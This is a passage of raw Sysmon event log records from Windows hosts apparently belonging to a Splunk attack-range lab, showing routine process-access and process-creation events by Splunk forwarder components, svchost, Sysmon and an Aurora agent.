Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000048823Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.985{FE4C2B44-E6A2-63C7-A706-00000000AF02}7884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000048822Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.983{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8A2C6B5054698E84E3F7E7C472C9BE5,SHA256=CC02D23FA883138AEB93FD317FFC2389F018380B68FC364E113D015323AEEAA8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000019093Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:30.354{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E6A2-63C7-4502-00000000B002}2608C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019092Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:30.354{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019091Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:30.354{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019090Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:30.354{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019089Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:30.354{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019088Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:30.354{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019087Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:30.354{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019086Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:30.354{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019085Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:30.354{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019084Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:30.354{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019083Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:30.354{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E6A2-63C7-4502-00000000B002}2608C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019082Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:30.354{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E6A2-63C7-4502-00000000B002}2608C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019081Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:30.355{E5A8D418-E6A2-63C7-4502-00000000B002}2608C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000019080Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:30.276{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2B3B3F163B991F7E2FC6EBD3BF9C9D93,SHA256=DED9E66DFDEA1FAB24EBF5BAC8BD4A254D99AE1931D0B09912E4A38F2FC152EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019079Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:30.185{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=88785CBAFA1E33E445307BA5BC28706F,SHA256=4C63CCEA749385EF29E696704D41415CE2D770E526BE4DC42002DA8E64D27D5A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019078Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:30.053{E5A8D418-E6A1-63C7-4402-00000000B002}23483812C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048821Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.507{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E6A2-63C7-A606-00000000AF02}7852C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048820Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.507{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E6A2-63C7-A606-00000000AF02}7852C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048819Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.507{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E6A2-63C7-A606-00000000AF02}7852C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048818Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.507{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E6A2-63C7-A606-00000000AF02}7852C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048817Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.507{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E6A2-63C7-A606-00000000AF02}7852C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048816Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.507{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E6A2-63C7-A606-00000000AF02}7852C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048815Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.365{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E6A2-63C7-A606-00000000AF02}7852C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048814Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.365{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048813Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.365{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048812Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.365{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048811Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 